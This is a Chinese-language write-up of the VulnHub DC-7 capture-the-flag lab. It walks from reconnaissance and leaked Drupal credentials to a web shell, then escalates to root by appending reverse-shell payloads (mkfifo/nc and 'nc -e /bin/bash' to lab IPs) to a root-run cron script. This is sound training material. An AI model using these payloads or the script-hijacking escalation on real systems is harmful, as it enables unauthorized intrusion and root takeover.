vulnhub-DC7
总结:社工尝试
先扫一下c段,发现一下靶机
然后扫一下端口
只有两端口是开放的 80 22
熟悉的drupal框架,只不过这个版本比较新,之前存在漏洞的是7
msf找不到
然后尝试一下searchsploit
工具,发现是找到的漏洞版本都太新,不适合
然后扫目录
sqlmap 尝试后都无果 最后后翻译了一下网站给的话
1 | DC-7引入了一些“新”概念,但我将留给你们去弄清楚它们是什么。:-) |
发现存在也该一个玩意,于是尝试去网上进行搜索发现了一个github地址
发现这个github地址
于是查看配置文件发现
1 |
|
于是可以尝试数据库连接或者ssh连接,看哪个能成功
ssh登录成功
发现存在加密文件
ls一下看见了两个文件 一个backups
一个mobx
进入backups
文件夹,发现两个文件,gpg
后缀的!!!第一次见 百度一下看看gpg
是一种基于密钥的加密方式,使用了一对密钥对消息进行加密和解密,来保证消息的安全传输格式是用来加密文件的。
然后再看一下 mbox
文件 cat mbox
发现在/opt/scripts/
有个可以执行的脚本文件 backups.sh
发现了drush
什么是drush????????????? 经过百度查阅发现drush
是drupal shell
专门管理drupal
站点的shell
进入到/var/www/html
目录下,使用drush
命令修改admin用户的密码为123456
,发现可以修改成功!!!
修改成功
但是登不进去
1 | drush php-eval 'db_query("DELETE FROM flood");' |
先修改密码 在执行这个语句才能登录进去
进入后台后 需要找一下哪能进行漏洞利用
在Content—>Add content–>Basic page下
因为这里可以写文件,然后就可以写木马,然后进行上传,然后我们找到上传地址,然后访问上传文件就可以利用shell了
但是这里没有php模板,所以我们就得自己装一个
1 | https://www.drupal.org/project/php # 插件下载地址 |
1 | https://ftp.drupal.org/files/projects/php-8.x-1.0.tar.gz #模块包 |
上传成功后,进行反弹shell
反弹成功,进行交互shell
1 | python -c 'import pty;pty.spawn("/bin/bash")' |
然后就是尝试进行提权了
就是利用之前发现的一个sh文件来进行提权
因为文件里的内容是这样的 rm xxxx
于是我们就可以考虑一下使用rm来进行反弹shell利用这个脚本反弹shell之后就是root权限了
1 | echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f | /bin/sh -i 2>&1 | nc 192.168.142.129 7777 >/tmp/f" >> backups.sh |
添加单纯的nc反弹shell也行 不用rm也行
1 | echo "nc -e /bin/bash/ 192.168.202.129 1234" >>backups.sh |